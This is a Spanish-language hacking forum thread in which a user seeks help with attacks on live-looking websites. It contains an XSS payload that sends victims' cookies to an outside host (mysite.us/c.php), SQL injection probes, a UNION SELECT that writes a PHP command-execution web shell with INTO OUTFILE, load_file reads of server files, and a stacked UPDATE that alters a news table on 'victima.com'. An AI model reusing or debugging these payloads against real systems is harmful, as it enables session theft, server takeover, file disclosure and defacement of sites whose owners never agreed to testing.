Mensajes

De hecho si pido disculpa no me di cuenta por ponertlo aqui.

"><script>document.location="[url="http://mysite.us/c.php?cookie="+"]http://mysite.us/c.php?cookie="+[/url] document.cookie;</script>

ya tambien lo e tratado y nada.

Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="[url="http://mysite.us/c.php?cookie="+document.cookie;"]http://mysite.us/c.php?cookie="+document.cookie;[/url]</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!

bueno seria bueno  que tratara de ver que base dato esta corriendo
primero pero para saber mas o menos usa
ejmplo
.php?id=1' order by 1--
.php?id=1' order by 1/*

solo ve cambiando el 1 por 2 3 cuatro hasta que tengas el error.

si necesitas mas ayuda solo deja saber.

Dios pero den una pista con mas sentido
algo que por lo menos ponga a pensar!!!

Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off

gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!

Pero tambien encontre otra web esta ves el user es root@localhost perfecto!
Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE
creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE  o un buen manual.

UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1

gracias por adelantado!

Buen gracias por las respuesta! Estoy tratando de usera el load_file()  para ver que pasa gracias.

http://www.victima.com/noticias.php?id=1%20union%20select%201,2,3,load_file(concat(char(0x22)%2bchar(0x69)%2bchar(0x6e)%2bchar(0x64)%2bchar(0x65)%2bchar(0x78)%2bchar(0x2e)%2bchar(0x70)%2bchar(0x68)%2bchar(0x70)%2bchar(0x22))),5,6,7%20from%20noticias/*

No me da error pero tampocomo me muesta los datos me puede explicar porue no muestra los datos!

http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre

Alguien me puede ayudar en el carito me dice tramposo y no se que hacer

Sirdarckcat hay punto estras si encuentro un XSS en una parte de la web donde no deberia?